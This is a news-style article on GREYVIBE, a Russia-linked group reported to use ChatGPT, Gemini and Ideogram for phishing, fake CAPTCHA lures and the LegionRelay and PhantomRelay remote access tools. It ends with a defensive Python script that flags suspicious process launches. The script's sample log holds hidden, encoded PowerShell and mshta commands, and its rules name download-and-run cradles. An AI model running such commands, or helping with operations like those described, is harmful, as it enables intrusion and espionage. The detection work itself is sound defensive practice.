
GREYVIBE Threat Actors Leverage ChatGPT and Google Gemini for Enhanced Cyberattack Operations


Threat actors are increasingly harnessing generative AI tools such as ChatGPT and Google Gemini to enhance their cyberattack operations. This shift is significantly lowering technical barriers and reshaping contemporary threat landscapes, as evidence mounts about the strategic integration of these advanced technologies into cybercriminal activities.

A recent report published by WithSecure has brought attention to a particular Russia-linked threat group known as GREYVIBE. This group has been systematically utilizing large language models (LLMs) in its campaigns targeting Ukraine and related entities since August 2025. As the geopolitical climate continues to evolve, GREYVIBE’s activities signal a concerning trend where sophisticated AI tools are not just the domain of security researchers but are also being used by malicious actors to conduct cyber warfare.

### The Mechanics of Cyberattack Operations

GREYVIBE has demonstrated a wide array of multi-vector attacks that include spear-phishing, the creation of fake CAPTCHA verification pages, and the establishment of malicious websites aimed at distributing malware. These tactics show an alarming sophistication and adaptability in their operational strategies.

One notable aspect of GREYVIBE’s approach is its phishing campaigns, branded as PhantomMail. These campaigns employ malicious archive files hosted on popular cloud storage services like Google Drive. Victims are duped into executing loaders disguised as legitimate documents, resulting in compromised systems. The skilful use of social-engineering tactics illustrates a deep understanding of human psychology and trust.

Another operation by GREYVIBE, dubbed PhantomClick, cleverly deploys fake CAPTCHA pages designed to resemble those of legitimate platforms such as Zoom. These impersonations aim to manipulate unsuspecting users into executing harmful commands, further underlining the group’s exploitation of social engineering.

In addition to these campaigns, GREYVIBE has launched PrincessClub operations, where fake adult-themed websites are used to entice victims, particularly Ukrainian military personnel, into downloading spyware and remote access tools. This tactic exemplifies the group’s ability to target vulnerable populations and utilize topical lures for malicious gain.

The report highlights that GREYVIBE extensively integrates AI tools, including ChatGPT, Google Gemini, and Ideogram AI, throughout the entire lifecycle of their attacks. This operational synergy allows the group to generate compelling phishing lures, construct malicious websites, develop obfuscated scripts, and even assist in malware creation. The implications of such automation are profound, enabling rapid development and modification of attack infrastructures while minimizing dependence on traditional malware patterns that defenders may find easier to identify.

### Tools and Techniques in Use

One significant innovation attributed to GREYVIBE is LegionRelay, a custom PowerShell-based remote access trojan (RAT) that researchers believe may have been partially developed with AI assistance. Despite its relatively simplistic architecture, LegionRelay is equipped with functionalities that allow attackers to execute commands, exfiltrate files, capture screenshots, and harvest sensitive data from applications like Telegram and WhatsApp. Critically, researchers have identified design flaws within LegionRelay that reveal portions of its backend infrastructure, thereby providing deeper insights into GREYVIBE’s operational tactics.

In addition to LegionRelay, GREYVIBE employs PhantomRelay, another RAT distinguished by its use of WebSocket communication and by modular scripting capabilities that can be extended after compromise. For mobile platforms, the group deploys FallSpy, an Android spyware capable of collecting contacts, call logs, location data, and device information. These tools are supported by custom obfuscators named DAYLIGHT and TEASOUP, designed to evade detection and thwart analysis.

AI plays a pivotal role in enabling GREYVIBE to efficiently scale its operations. By automating coding tasks, generating convincing social engineering content, and assisting in infrastructure setup, these technologies significantly reduce the skill threshold typically required for advanced cyber operations. This capability not only accelerates their activities but also complicates the attribution of cyber incidents. AI-generated artifacts can vary considerably across different campaigns, undermining traditional detection methods that rely on identifying code reuse and recognizing behavioral patterns.

### Conclusion and Implications

Although GREYVIBE operates in alignment with Russian state interests—particularly in intelligence gathering related to the ongoing conflict in Ukraine—the group exhibits traits indicative of both state-sponsored and cybercriminal endeavors. Evidence suggests that GREYVIBE operates within the Moscow time zone, communicates in Russian, and may maintain connections with known cybercrime ecosystems, such as those linked to TrickBot clusters. This duality between state-sponsored initiatives and organized cybercrime further complicates the landscape of modern cybersecurity.

The rise of AI-assisted groups like GREYVIBE signals a transformative shift in the arena of cyber warfare, where automation and generative technologies enhance the speed and adaptability of cyber threats. For defenders, this evolving landscape presents numerous challenges. As cyber attackers grow more adept at iterating their tactics to evade detection, organizations must bolster their defenses by strengthening email filtering systems, monitoring for unusual command executions, and adopting behavior-based detection methodologies to counter increasingly sophisticated, AI-driven threats. The urgency to adapt becomes paramount as the stakes in this digital battleground continue to rise.
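The PhantomClick lure described above ends with a user launching a command by hand, and the closing paragraph recommends monitoring for unusual command executions and behaviour-based detection. The script below is an added example of what that recommendation looks like in practice; it is not code from the article, from WithSecure, or from the report the article summarises. It scores process-creation events on generic behaviours (a script host started from a user-facing process, encoded or hidden PowerShell invocations, download cradles, remote URLs) rather than on any signature, so it applies beyond the single CAPTCHA case. The log format, field names, rule weights and sample events are constructed assumptions and are not GREYVIBE indicators from the report.

```python
"""Behaviour-based triage of process-creation events.

Added example for this article; not code from WithSecure or from the report
the article summarises. The log format, field names, rule weights and sample
events are constructed for illustration and are not published GREYVIBE
indicators.
"""
import re
from dataclasses import dataclass

# Hypothetical log format: one event per line as key=value pairs, with values
# containing spaces double-quoted (loosely modelled on Sysmon Event ID 1).
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample events. The first is the shape a "paste this into the Run
# box" lure tends to produce (QQBCAEMA is just UTF-16LE "ABC" in base64); the
# second is a routine scheduled script and should score zero.
SAMPLE_LOG = [
    r'ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe -w hidden -ep bypass -enc QQBCAEMA"',
    r'ParentImage=C:\Windows\System32\svchost.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe -NoProfile -File C:\ProgramData\inventory\collect.ps1"',
    r'ParentImage="C:\Program Files\Google\Chrome\Application\chrome.exe" '
    r'Image=C:\Windows\System32\mshta.exe '
    r'CommandLine="mshta.exe https://example.invalid/verify"',
    r'ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\notepad.exe '
    r'CommandLine="notepad.exe C:\Users\alice\notes.txt"',
]

# Script hosts a copy-and-run lure ends up launching, and the user-facing
# processes they are launched from in that scenario. Assumed lists.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe",
                       "firefox.exe", "winword.exe", "outlook.exe"}

# (weight, pattern, reason), applied to the lower-cased command line.
COMMAND_LINE_RULES = [
    (2, re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?:\s|$)"),
     "base64-encoded command block"),
    (1, re.compile(r"(?:^|\s)-w[a-z]*\s+hidden"), "hidden window requested"),
    (1, re.compile(r"(?:^|\s)-e(?:p|x[a-z]*)\s+bypass"),
     "execution policy bypass"),
    (2, re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                   r"\bcurl\b|invoke-expression|\biex\b|frombase64string"),
     "download or decode-and-run cradle"),
    (1, re.compile(r"\b(?:https?|wss?)://"), "remote URL on the command line"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one key=value log line into a ProcessEvent."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return ProcessEvent(fields.get("ParentImage", ""), fields.get("Image", ""),
                        fields.get("CommandLine", ""))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Only script hosts are scored at all."""
    image, parent = basename(ev.image), basename(ev.parent_image)
    if image not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    if parent in USER_FACING_PARENTS:
        score += 2
        reasons.append(f"{image} spawned by user-facing process {parent}")
    cmd = ev.command_line.lower()
    for weight, pattern, reason in COMMAND_LINE_RULES:
        if pattern.search(cmd):
            score += weight
            reasons.append(reason)
    return score, reasons


def triage(lines: list[str], threshold: int = 3) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Score every line and return events at or above the threshold, highest first."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev, score, reasons))
    return sorted(flagged, key=lambda t: t[1], reverse=True)


if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_LOG):
        print(f"[{score}] {basename(ev.parent_image)} -> {ev.command_line}")
        for r in reasons:
            print(f"      - {r}")
```

On the sample log this flags the encoded, hidden PowerShell launched from explorer.exe (score 6) and the mshta.exe fetch from a browser (score 3), while the scheduled inventory script and notepad score zero. The weights are illustrative; in a real deployment they would be tuned against the organisation's own baseline of script-host usage, and the parent-process list extended to whatever user-facing applications are in use.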
